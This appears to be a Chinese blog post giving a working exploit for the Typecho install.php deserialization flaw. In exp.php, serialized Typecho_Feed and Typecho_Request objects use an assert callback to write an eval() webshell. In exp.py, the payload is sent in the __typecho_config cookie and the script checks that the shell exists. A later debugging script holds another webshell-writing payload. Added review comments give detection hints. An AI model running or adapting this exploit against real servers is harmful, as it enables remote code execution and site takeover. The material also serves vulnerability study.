(来源)[https://mp.weixin.qq.com/s/kra9OUpwCC7zotDVUmGWyQ]

exp.php:

<?php

/**
* Created by PhpStorm.
* User: RaI4over
* Date: 2017/10/19
* Time: 15:17
* 生成 _typecho_config 的值
*/
class Typecho_Feed
{
// Review note: this is a stand-in for a class of the same name in the target
// application. Only the class name, property names and values matter: the
// object is serialized (see the bottom of this file) and, presumably, rebuilt
// by unserialize() on the server with this attacker-chosen private state. The
// class has no behaviour of its own beyond storing what is passed in.
const RSS2 = 'RSS 2.0';
private $_type;
private $_charset;
private $_lang;
private $_items = array();

// $_version is not declared above, so the first assignment below creates a
// dynamic (public) property. That matches the serialized text in the page's
// test script, where "_version" is a plain 8-byte key while the declared
// private names carry longer declared lengths.
public function __construct($version, $type = self::RSS2, $charset = 'UTF-8', $lang = 'en')
{
$this->_version = $version;
$this->_type = $type;
$this->_charset = $charset;
$this->_lang = $lang;
}

// Appends one item; the top-level code uses it to nest a Typecho_Request
// object under the item's 'author' key. What the target does with that
// nested object is not shown on this page.
public function addItem(array $item)
{
$this->_items[] = $item;
}
}

class Typecho_Request
{
// 'screenName' holds PHP source text that writes a file ('./a.php') whose
// contents are an eval()-based backdoor. The text is only data here; it
// becomes code only if the target evaluates the param string.
private $_params = array('screenName'=>'fputs(fopen(\'./a.php\',\'w\'),\'<?php @eval($_POST[minty]);?>\')');
// 'assert' is presumably used by the target as a callback applied to the
// params; in PHP 5.x/7.x assert() on a string evaluates it as code, which
// is the reason the string above is shaped as PHP. TODO confirm against the
// target version; assert() no longer accepts strings in PHP 8.
private $_filter = array('assert');
//private $_filter = array('assert', array('Typecho_Response', 'redirect'));

}

// Build the object graph: a Typecho_Feed whose only item carries a
// Typecho_Request as its 'author', placed under 'adapter' in an array
// alongside a free-form 'prefix'.
$payload1 = new Typecho_Feed(5, 'ATOM 1.0');
$payload2 = new Typecho_Request();
$payload1->addItem(array('author' => $payload2));
// $exp is auto-vivified as an array on first assignment; it is never
// initialised explicitly.
$exp['adapter'] = $payload1;
$exp['prefix'] = 'MxxY';
// exp.py reads this stdout verbatim and sends it in the __typecho_config
// cookie. Defender notes: a __typecho_config cookie whose base64 decodes to
// PHP serialized data ("a:"/"O:" prefix) on a request to install.php is a
// clear indicator; on the application side, cookie contents must never be
// passed to unserialize() unmodified — authenticate the value (HMAC) first
// and/or call unserialize() with ['allowed_classes' => false].
echo base64_encode(serialize($exp));

exp.py:

import requests
import os

if __name__ == '__main__':
# NOTE(review): this is Python 2 code (print statements), and the body of
# this if-block has lost its indentation in this copy, so it will not parse
# as shown. The lines below are kept as-is and only annotated.
print ''' ____ ____ _ _ _
| __ ) _ _ | _ \ __ _(_) || | _____ _____ _ __
| _ \| | | | | |_) / _` | | || |_ / _ \ \ / / _ \ '__|
| |_) | |_| | | _ < (_| | |__ _| (_) \ V / __/ |
|____/ \__, | |_| \_\__,_|_| |_| \___/ \_/ \___|_|
|___/
'''

# 'targert_url' (sic) is the name used throughout this script; the usage
# notes on the page refer to it as target_url. The value is a placeholder.
targert_url = 'https://xxxxx';

# Precondition probe: nothing further happens unless /install.php answers
# 200. Defender takeaway: removing or blocking install.php after setup stops
# this script at its first step.
rsp = requests.get(targert_url + "/install.php");
if rsp.status_code != 200:
exit('The attack failed and the problem file does not exist !!!')
else:
print 'You are lucky, the problem file exists, immediately attack !!!'

# Defined but never passed to any requests call below, so as written no
# traffic goes through this proxy.
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080", }

# Shells out to exp.php in the current directory and takes its stdout
# verbatim (including any trailing newline php prints) as the cookie value.
typecho_config = os.popen('php exp.php').read()

# The serialized/base64 payload rides in the __typecho_config cookie; the
# other cookie values look copied from one browser session and are not
# computed here. Detection hint: a __typecho_config cookie whose base64
# decodes to PHP serialized data ("a:"/"O:" prefix) on a request to
# install.php is a strong indicator of this technique.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
'Cookie': 'antispame=1508415662; antispamkey=cc7dffeba8d48da508df125b5a50edbd; PHPSESSID=po1hggbeslfoglbvurjjt2lcg0; __typecho_lang=zh_CN;__typecho_config={typecho_config};'.format(typecho_config=typecho_config),
'Referer': targert_url}

# The request that presumably makes the server consume the cookie; the
# response body is not inspected and redirects are not followed.
url = targert_url + "/install.php?finish=1"

requests.get(url,headers=headers,allow_redirects=False)

# Success check: this path must match the file exp.php writes ('./a.php'),
# as the usage notes say. A 200 here is the only evidence the script uses.
shell_url = targert_url + '/a.php'
if requests.get(shell_url).status_code == 200:
print 'shell_url: ' + shell_url
else:
print "Getshell Fail!"

  • 将exp.php和exp.py放至同级目录,修改exp.py中的target_url为目标url
  • 一句话木马内容和路径可在exp.php中修改,修改后同样需要修改exp.py中的路径

另外

我在尝试修改exp时,想不使用php去获得payload,于是将执行php exp.php之后输出的base64编码还原为原文,但是在再次使用base64进行编码的时候发现编码后的base64值与之前的不一致,不知道为什么

测试脚本如下

import base64

# NOTE(review): Python 2 script (print statements); 'str' shadows the builtin
# of the same name, so anything below that needs str() would break.
str="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"

# Decodes the base64 that php exp.php printed back to the raw serialized bytes.
str2=base64.b64decode(str)

print str2

# 'code' is the serialized text as it appeared when printed, pasted back as a
# literal. Two things make 'str3 == str' false regardless of any encoding
# setting:
#  1. The declared lengths do not match the visible names: s:19 for
#     "Typecho_Feed_type" (17 visible chars), s:24 for
#     "Typecho_Request_params" (22 visible chars). Bytes that were present in
#     str2 are missing from this literal — most likely non-printable bytes
#     that PHP's serialize() emits around private property names, which a
#     terminal does not show. Compare repr(str2) with repr(code) to see the
#     actual difference rather than the printed form.
#  2. This literal is not even the output of the page's exp.php: the file
#     path and the 'prefix' value differ, so it came from a different run.
code="""a:2:{s:7:"adapter";O:12:"Typecho_Feed":5:{s:19:"Typecho_Feed_type";s:8:"ATOM 1.0";s:22:"Typecho_Feed_charset";s:5:"UTF-8";s:19:"Typecho_Feed_lang";s:2:"en";s:20:"Typecho_Feed_items";a:1:{i:0;a:1:{s:6:"author";O:15:"Typecho_Request":2:{s:24:"Typecho_Request_params";a:1:{s:10:"screenName";s:80:"fputs(fopen('./usr/themes/default/img/tew.php','w'),'<?php @eval($_POST[x]);?>')";}s:24:"Typecho_Request_filter";a:1:{i:0;s:6:"assert";}}}}s:8:"_version";i:5;}s:6:"prefix";s:8:"Rai4over";}"""

# Re-encodes the pasted text and compares with the original base64 string.
str3 =base64.b64encode(code)

print str3==str

很迷。。可能是编码问题?
解决之后再更新吧。。


2017-10-28
